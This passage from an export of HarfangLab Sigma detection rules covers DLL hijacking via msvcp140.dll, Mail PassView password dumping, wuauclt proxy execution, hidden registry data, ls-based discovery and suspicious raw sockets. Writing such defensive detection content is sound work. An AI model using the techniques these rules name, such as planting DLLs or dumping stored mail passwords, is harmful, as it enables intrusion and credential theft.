'f2d585ff96afa3a77e09f5b37e7b3230'\n - 'c0e775d13a8146396b3de4dc441694a7'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_spool:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\x64\\3\\msvcp140.dll'\n\n exclusion_java: # too many java process with unpredictable name..\n ImageLoaded|endswith: '\\bin\\msvcp140.dll'\n\n exclusion_zotero:\n ProcessImage|endswith: '\\Zotero*\\zotero.exe'\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Zotero\\msvcp140.dll'\n\n exclusion_ideashare:\n ProcessImage:\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShare\\IdeaShare.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShare\\IdeaShareService.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShareKey\\IdeaShareService.exe'\n - '?:\\ProgramData\\IdeaShare\\IdeaShare.exe'\n ImageLoaded:\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShareKey\\msvcp140.dll'\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShare\\msvcp140.dll'\n - '?:\\ProgramData\\IdeaShare\\msvcp140.dll'\n\n exclusion_werfault:\n ProcessImage:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '?:\\Windows\\system32\\WerFault.exe'\n\n exclusion_teams:\n - ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Teams\\current\\msvcp140.dll'\n - ProcessName: 'regsvr32.exe'\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\TeamsMeetingAddin\\\\*\\\\*\\msvcp140.dll'\n\n exclusion_onedrive:\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\msvcp140.dll'\n ProcessImage:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\Microsoft.SharePoint.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\FileSyncConfig.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\FileCoAuth.exe'\n - 
'?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\OneDriveLauncher.exe'\n\n exclusion_sap:\n ProcessImage|endswith: '\\DATA_UNITS\\CrystalReports\\setup.engine\\actionagentproc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SAP SE'\n\n exclusion_sonix:\n ProcessCommandLine: '?:\\WINDOWS\\System32\\svchost.exe -k Camera -s FrameServer'\n ImageLoaded: '?:\\Windows\\System32\\SONiX\\msvcp140.dll'\n\n exclusion_cisco:\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\\\*\\dependencies\\msvcp140.dll'\n ProcessImage:\n - '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\\\*\\dependencies\\wmlhost.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\CiscoCollabHost.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "01198d94-cc61-455c-9bd1-37096dd366f1", + "rule_name": "Unsigned msvcp140.dll DLL Loaded", + "rule_description": "Detects a suspicious unsigned DLL named 'msvcp140.dll' loaded by a process that could be the target to DLL hijacking.\nAdversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\nIt is recommended to investigate the behavior of the process loading the DLL to identify any suspicious activity, as well as to analyze the DLL itself for malicious content.\n", + "rule_creation_date": "2024-07-23", + "rule_modified_date": "2026-02-10", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "01474426-6a8b-4834-9f6f-54b7c359a027", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + 
"effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.077917Z", + "creation_date": "2026-03-23T11:45:34.077919Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.077924Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.nirsoft.net/utils/mailpv.html", + "https://attack.mitre.org/techniques/T1555/" + ], + "name": "t1555_mail_passview_execution.yml", + "content": "title: Mail PassView Execution\nid: 01474426-6a8b-4834-9f6f-54b7c359a027\ndescription: |\n Detects the execution of Mail PassView, a NirSoft utility allowing users to retrieve passwords from many mail clients.\n It can be used by attackers to get the mail passwords in an infected hosts.\n It is recommended to investigate the actions that were performed by Mail PassView as well as Mail PassView's execution context to determine its legitimacy.\nreferences:\n - https://www.nirsoft.net/utils/mailpv.html\n - https://attack.mitre.org/techniques/T1555/\ndate: 2025/10/31\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.MailPassView\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n 
selection:\n - Image|endswith: '\\mailpv.exe'\n # No OrginalFilename, we have to rely on another PE field\n # The two spaces are intentional\n - Product: 'Email Password-Recovery'\n\n condition: selection\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "01474426-6a8b-4834-9f6f-54b7c359a027", + "rule_name": "Mail PassView Execution", + "rule_description": "Detects the execution of Mail PassView, a NirSoft utility allowing users to retrieve passwords from many mail clients.\nIt can be used by attackers to get the mail passwords in an infected hosts.\nIt is recommended to investigate the actions that were performed by Mail PassView as well as Mail PassView's execution context to determine its legitimacy.\n", + "rule_creation_date": "2025-10-31", + "rule_modified_date": "2025-11-04", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access" + ], + "rule_technique_tags": [ + "attack.t1555" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "016b5935-600b-4242-91e1-e727c9410d11", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:34.070359Z", + "creation_date": "2026-03-23T11:45:34.070361Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.070365Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://lolbas-project.github.io/lolbas/Binaries/Wuauclt/", + "https://attack.mitre.org/techniques/T1218/" + ], + "name": "t1218_wuauctl.yml", + "content": "title: Proxy Execution via Wuauclt\nid: 016b5935-600b-4242-91e1-e727c9410d11\ndescription: |\n Detects the execution of wuauclt.exe as a legitimate binary proxy for System Binary Proxy Execution.\n Malicious actors may exploit wuauclt.exe to execute arbitrary DLLs, evading detection by leveraging trusted system binaries.\n It is recommended to investigate the process and parameters of wuauclt.exe execution, analyze the DLL for malicious content, and ensure that any executed code aligns with legitimate system operations.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Wuauclt/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/11/17\nmodified: 2025/02/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Wuauclt\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\wuauclt.exe'\n - OriginalFileName: 'wuauclt.exe'\n\n selection_commandline:\n CommandLine|contains|all:\n - 'UpdateDeploymentProvider'\n - 'RunHandlerComServer'\n\n exclusion_legitimate:\n CommandLine|contains:\n - ' UpdateDeploymentProvider.dll '\n - ' wuaueng.dll '\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": 
"016b5935-600b-4242-91e1-e727c9410d11", + "rule_name": "Proxy Execution via Wuauclt", + "rule_description": "Detects the execution of wuauclt.exe as a legitimate binary proxy for System Binary Proxy Execution.\nMalicious actors may exploit wuauclt.exe to execute arbitrary DLLs, evading detection by leveraging trusted system binaries.\nIt is recommended to investigate the process and parameters of wuauclt.exe execution, analyze the DLL for malicious content, and ensure that any executed code aligns with legitimate system operations.\n", + "rule_creation_date": "2022-11-17", + "rule_modified_date": "2025-02-20", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1218" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "01833e69-127a-4ff4-a998-d4decbae548f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.069505Z", + "creation_date": "2026-03-23T11:45:34.069507Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.069512Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + 
"references": [ + "https://attack.mitre.org/techniques/T1112/" + ], + "name": "t1112_hidden_registry_data_space.yml", + "content": "title: Possible Hidden Registry Data Created\nid: 01833e69-127a-4ff4-a998-d4decbae548f\ndescription: |\n Detects an attempt to hide data in the Registry by adding multiple spaces at the beginning of a value.\n Adversaries often manipulate the Windows Registry by adding spaces to obscure data, hide configurations, or remove evidence.\n It is recommended to investigate the source of the registry modification, and check for related events that may indicate unauthorized access or malicious activity.\nreferences:\n - https://attack.mitre.org/techniques/T1112/\ndate: 2021/10/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n Details|startswith: ' '\n\n # Some softwares set values containing only a random number of spaces\n exclusion_all_spaces:\n Details|startswith: ' '\n Details|endswith: ' '\n\n exclusion_image:\n Image:\n - '?:\\Program Files (x86)\\Avid\\iNEWS*\\ANWS.exe'\n - '?:\\Windows\\System32\\drivers\\Intel\\ICPS\\IntelConnect.exe'\n - '?:\\Program Files\\Photon Engineering\\FRED *\\Bin\\Fred.exe'\n - '?:\\Program Files (x86)\\Thermo\\Avantage\\Bin\\Avantage.exe'\n - '?:\\program files\\thermo scientific\\avantage\\bin\\avantage.exe'\n\n exclusion_commandline:\n Image: '?:\\windows\\system32\\regsvr32.exe'\n ProcessCommandLine:\n - '/s ?:\\program files\\thermo scientific\\avantage\\bin\\xraygun.ocx'\n - '/s ?:\\program files\\thermo scientific\\avantage\\bin\\xraygun_??????.ocx'\n - '/s ?:\\program files\\thermo scientific\\avantage\\bin\\vgchargecompensation.ocx'\n\n exclusion_tiworker:\n Image|endswith: '\\TiWorker.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n 
exclusion_windowsupdatebox:\n ProcessParentImage|endswith:\n - '\\WindowsUpdateBox.exe'\n - ':\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n - '\\TiWorker.exe'\n - '\\Sources\\SetupPrep.exe'\n TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\WSMAN\\Plugin\\Microsoft.Windows.ServerManagerWorkflows\\ConfigXML'\n Details|contains|all:\n - 'PlugInConfiguration'\n - 'PublicKeyToken'\n - 'MaxConcurrentCommandsPerShell'\n\n exclusion_adobe:\n Image|endswith:\n - '\\AcroRd32.exe'\n - '\\Acrobat.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Adobe Inc.'\n - 'Adobe Systems, Incorporated'\n TargetObject|endswith:\n # - '\\Software\\Adobe\\Acrobat Reader\\DC\\SessionManagement\\cWindowsPrev\\cWin0\\cTab*\\tfilename'\n # - '\\Software\\Adobe\\Acrobat Reader\\DC\\SessionManagement\\cWindowsCurrent\\cWin0\\cTab*\\tfilename'\n # - '\\SOFTWARE\\Adobe\\Acrobat Reader\\2017\\AVGeneral\\cRecentFiles\\c8\\tFileName'\n - '\\SOFTWARE\\Adobe\\Acrobat Reader\\\\*\\tfilename'\n - '\\SOFTWARE\\Adobe\\Adobe Acrobat\\\\*\\tfilename'\n\n exclusion_jalios:\n Image: '?:\\Program Files (x86)\\Jalios\\Jalios JDrive\\srm.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'JALIOS'\n Details|contains:\n - '__AChangedOverlay'\n - '__ASynchronizedOverlay'\n - '__APrivateOverlay'\n - '__ATBUOverlay'\n - '__ALockedOverlay'\n\n exclusion_setuphost:\n Image: '?:\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n TargetObject:\n - 'HKLM\\$OFFLINE_RW_????????$SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Shell Extensions\\Approved\\{????????-????-????-????-????????????}'\n - 'HKLM\\$OFFLINE_RW_????????$SOFTWARE\\Classes\\CLSID\\{????????-????-????-????-????????????}\\(Default)'\n Details|contains:\n - '__AChangedOverlay'\n - '__ASynchronizedOverlay'\n - '__APrivateOverlay'\n - '__ATBUOverlay'\n - '__ALockedOverlay'\n\n exclusion_wsman:\n Image: '?:\\Windows\\System32\\WSManHTTPConfig.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n TargetObject: 
'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN\\Migration\\Plugin\\Microsoft.Windows.ServerManagerWorkflows\\ConfigXML'\n\n exclusion_sap:\n Image:\n - '?:\\Program Files (x86)\\SAP\\FrontEnd\\SAPgui\\saplogon.exe'\n - '?:\\Program Files (x86)\\SAP\\FrontEnd\\SAPGUI\\saplgpad.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SAP SE'\n\n exclusion_pdf_architect:\n Image: '?:\\Program Files\\PDF Architect ?\\architect.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'pdfforge GmbH'\n\n exclusion_smbios2reg:\n Image|endswith: '\\BeetleInfo\\Smbios2Reg.exe'\n ProcessOriginalFileName: 'Smbios2Reg.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Wincor Nixdorf\\BeetleInfo SensorService\\DMI\\Mainboard'\n\n exclusion_notepad:\n Image:\n - '?:\\Windows\\System32\\notepad.exe'\n - '?:\\Windows\\SysWOW64\\notepad.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Notepad\\\\*String'\n\n exclusion_ssms:\n Image: '?:\\Program Files (x86)\\Microsoft SQL Server Management Studio *\\Common7\\IDE\\Ssms.exe'\n TargetObject|endswith:\n - '\\SOFTWARE\\Microsoft\\SQL Server Management Studio\\\\*_IsoShell\\Find\\Find'\n - '\\SOFTWARE\\Microsoft\\SQL Server Management Studio\\\\*_IsoShell\\Find\\Find *'\n\n exclusion_softerra:\n Image|endswith: '\\ldapbrowser.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Softerra, Ltd.'\n TargetObject|endswith: '\\SOFTWARE\\Softerra\\LDAP Browser *\\Settings\\QuickSearchBar\\\\*'\n\n exclusion_acdsystems:\n Image|endswith: '\\ACDSee??.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ACD Systems International Inc'\n TargetObject|endswith: '\\SOFTWARE\\ACD Systems\\ACDSee\\\\*\\PrintOptions\\Presets\\PrintContactSheet\\Default\\strFtrText'\n\n exclusion_outlook:\n ProcessOriginalFileName: 'Outlook.exe'\n TargetObject:\n - 'HKU\\S-*\\SOFTWARE\\Microsoft\\Office\\\\*\\Outlook\\Profiles\\Outlook\\\\*\\Reply-Forward Signature'\n - 'HKU\\S-*\\SOFTWARE\\Microsoft\\Office\\\\*\\Outlook\\Profiles\\Outlook\\\\*\\New Signature'\n\n condition: selection 
and not 1 of exclusion_*\nlevel: high\n#level: medium\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "01833e69-127a-4ff4-a998-d4decbae548f", + "rule_name": "Possible Hidden Registry Data Created", + "rule_description": "Detects an attempt to hide data in the Registry by adding multiple spaces at the beginning of a value.\nAdversaries often manipulate the Windows Registry by adding spaces to obscure data, hide configurations, or remove evidence.\nIt is recommended to investigate the source of the registry modification, and check for related events that may indicate unauthorized access or malicious activity.\n", + "rule_creation_date": "2021-10-08", + "rule_modified_date": "2025-04-15", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1112" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "01ce3d93-1705-4c9f-a0f9-4c0e16af130b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "low", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.613285Z", + "creation_date": "2026-03-23T11:45:34.613289Z", + "enabled": true, + "hl_status": "stable", 
+ "hl_testing_start_time": "2026-03-23T11:45:34.613296Z", + "rule_level": "low", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1083/", + "https://attack.mitre.org/techniques/T1005/" + ], + "name": "t1083_recursive_ls_linux.yml", + "content": "title: File and Directory Discovered via ls\nid: 01ce3d93-1705-4c9f-a0f9-4c0e16af130b\ndescription: |\n Detects the execution of ls with special arguments that may be used for file and directory discovery.\n Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1083/\n - https://attack.mitre.org/techniques/T1005/\ndate: 2022/12/01\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1083\n - attack.t1005\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/ls'\n\n # When the agent is under a lot of pressure, the parent information of a process can be missing.\n # Exceptionnaly for this rule, because it triggers so frequently with a low severity, we will ignore\n # its instances where the parent is missing.\n # When the parent is missing, the ParentImage or ParentCommandLine field is also missing (it is not empty or null)\n # so we can't easily match against that.\n # Instead, we reverse the problem by requiring the ParentImage fields to contain a `\\`.\n ParentImage|contains: '\\'\n\n selection_recursive:\n CommandLine|contains:\n - ' -R'\n - ' -?R'\n - ' -??R'\n - ' -???R'\n - ' -????R'\n - ' -?????R'\n\n selection_arg_all:\n CommandLine|contains:\n - ' -a'\n - ' -?a'\n - ' 
-??a'\n - ' -???a'\n - ' -????a'\n - ' -?????a'\n selection_arg_l:\n CommandLine|contains:\n - ' -l'\n - ' -?l'\n - ' -??l'\n - ' -???l'\n - ' -????l'\n - ' -?????l'\n\n exclusion_commandline:\n CommandLine:\n - '* --color=auto *'\n - 'ls --color=auto'\n - '* --color=tty *'\n - 'ls --color=tty'\n - 'ls --color -d .'\n - 'ls -? /proc/*'\n - 'ls -?? /proc/*'\n - 'ls -? /usr/*'\n - 'ls -? /var/*'\n - 'ls -?? /var/*'\n - 'ls -?? /run/*'\n - '/bin/ls -? /proc/*'\n - '/bin/ls -?? /proc/*'\n - '/bin/ls -? /usr/*'\n - '/bin/ls -? /var/*'\n - '/bin/ls -?? /var/*'\n - '/bin/ls -ld /run/*'\n - 'ls -l libreoffice'\n - '/bin/ls -l ./jre/bin/java'\n\n exclusion_qualys1:\n - GrandparentImage: '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - CommandLine:\n - '*/qualys/cloud-agent/*'\n - 'ls -ltr /var/log/qualys/*'\n exclusion_qualys2:\n CommandLine: 'ls -ld /root'\n ParentImage: '/usr/bin/bash'\n GrandparentImage: '/usr/bin/bash'\n exclusion_qualys3:\n GrandparentImage: '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n CommandLine|startswith: 'ls -ld /root/'\n\n exclusion_bladelogic:\n ParentImage: '/opt/bmc/bladelogic/RSCD/bin/rscd_full'\n\n exclusion_ransomguard:\n CommandLine: 'ls -ld /root/.ransomguard.???'\n\n condition: selection and selection_recursive and 1 of selection_arg_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "01ce3d93-1705-4c9f-a0f9-4c0e16af130b", + "rule_name": "File and Directory Discovered via ls", + "rule_description": "Detects the execution of ls with special arguments that may be used for file and directory discovery.\nAdversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nIt is recommended to investigate the parent process for suspicious activities.\n", + 
"rule_creation_date": "2022-12-01", + "rule_modified_date": "2025-01-28", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.discovery" + ], + "rule_technique_tags": [ + "attack.t1005", + "attack.t1083" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "01cf0e26-1674-4236-aa42-024891c8915c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.085708Z", + "creation_date": "2026-03-23T11:45:34.085710Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.085714Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", + "https://man7.org/linux/man-pages/man7/raw.7.html", + "https://man7.org/linux/man-pages/man7/packet.7.html", + "https://attack.mitre.org/techniques/T1095/", + "https://attack.mitre.org/techniques/T1040/" + ], + "name": "t1095_rawsocket_suspicious_path.yml", + "content": "title: Raw Socket Created From Suspicious Path\nid: 01cf0e26-1674-4236-aa42-024891c8915c\ndescription: |\n Detects the creation of a raw socket from a 
suspicious path.\n Raw sockets are a special kind of socket that allow deep manipulation of network packets, either for inspection, filtering, custom protocols or packet forging.\n It may hint at a malware trying to hide its traffic without having to open a port or using a custom protocol to communicate with its C2.\n It is recommended to ensure the process who created this raw socket had a legitimate reason to do so and that the host wasn't compromised.\nreferences:\n - https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/\n - https://man7.org/linux/man-pages/man7/raw.7.html\n - https://man7.org/linux/man-pages/man7/packet.7.html\n - https://attack.mitre.org/techniques/T1095/\n - https://attack.mitre.org/techniques/T1040/\ndate: 2024/02/02\nmodified: 2026/02/25\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1095\n - attack.defense_evasion\n - attack.persistence\n - attack.t1205.001\n - attack.t1572\n - attack.credential_access\n - attack.discovery\n - attack.t1040\n - classification.Linux.Source.NetworkActivity\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: network_rawsocket\n product: linux\ndetection:\n\n selection:\n # Ensure that events without a process do not trigger this rule.\n # This happens typically when the agent is overloaded.\n ProcessImage|startswith:\n - '/'\n - 'memfd:'\n ProcessAncestors|contains: '?'\n\n # Filter common \"good\" directories to only retain the suspicious ones (/home, /tmp, /run, etc.)\n filter_system_directories:\n ProcessImage|startswith:\n - '/bin/'\n - '/sbin/'\n - '/usr/bin/'\n - '/usr/sbin/'\n - '/usr/local/'\n - '/opt/'\n - '/lib/'\n - '/lib64/'\n - '/usr/lib/'\n - '/usr/lib64/'\n - '/usr/libexec/'\n - '/usr/share/'\n - '/snap/'\n - '/var/lib/snapd/snap/'\n - '/nix/store/*/bin/'\n - '/nix/store/*/libexec/'\n\n exclusion_k3s:\n ProcessImage|startswith: '/var/lib/rancher/k3s/data/*/bin/'\n\n 
exclusion_container:\n - ProcessParentImage:\n - '/usr/bin/containerd-shim-runc-v2'\n - '/opt/containerd/bin/containerd-shim-runc-v2'\n - '/usr/local/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/opt/containerd/bin/containerd-shim-runc-v2|'\n - '|/usr/local/bin/containerd-shim-runc-v2|'\n\n exclusion_u01:\n ProcessImage:\n - '/u01/app/*/bin/cping'\n - '/u01/app/*/bin/acquisition'\n - '/u01/app/*/bin/gyrophare'\n - '/u01/app/*/bin/orarootagent.bin'\n\n exclusion_tina:\n ProcessImage:\n - '*/tina/Bin/.tina_ping.real'\n - '/usr/Atempo/tina/Bin/*'\n - '/usr/Atempo/TimeNavigator/*'\n\n exclusion_devolonetsv:\n # /var/lib/devolonetsvc/updates/firmware/devolo-firmware-qca7420/avupdate\n ProcessImage: '/var/lib/devolonetsvc/updates/firmware/devolo-firmware-*/avupdate'\n\n exclusion_openprocess:\n ProcessImage: '/usr/openprocess/*/bin/ops?server'\n\n exclusion_hlab:\n ProcessImage|endswith: '/hl-ebpf-sweeper'\n\n exclusion_lacework_datacollector:\n # /var/lib/lacework/6.11.0.21858/datacollector\n # /var/lib/lacework/6.7.6.19823/datacollector\n ProcessImage: '/var/lib/lacework/*/datacollector'\n\n exclusion_azure_networkwatcher:\n # /var/lib/waagent/Microsoft.Azure.NetworkWatcher.NetworkWatcherAgentLinux-1.4.3320.1/amd64/NetworkWatcherAgent\n ProcessImage: '/var/lib/waagent/Microsoft.Azure.NetworkWatcher.NetworkWatcherAgentLinux-*/*/NetworkWatcherAgent'\n\n exclusion_ibm_hsm:\n ProcessImage:\n - '/usr/lpp/mmfs/bin/mmcmi'\n - '/usr/lpp/mmfs/bin/mmfsd'\n - '/usr/lpp/mmfs/libexec/ctdb/ctdb_killtcp'\n\n exclusion_veritas:\n ProcessImage:\n - '/usr/openv/volmgr/bin/avrd'\n - '/usr/openv/volmgr/bin/tldd'\n\n exclusion_nexpose_vulnscanner:\n ProcessCurrentDirectory: '/data/rapid7/nexpose/nsc/'\n\n exclusion_container_iptables:\n ProcessAncestors|contains: '/usr/bin/containerd'\n 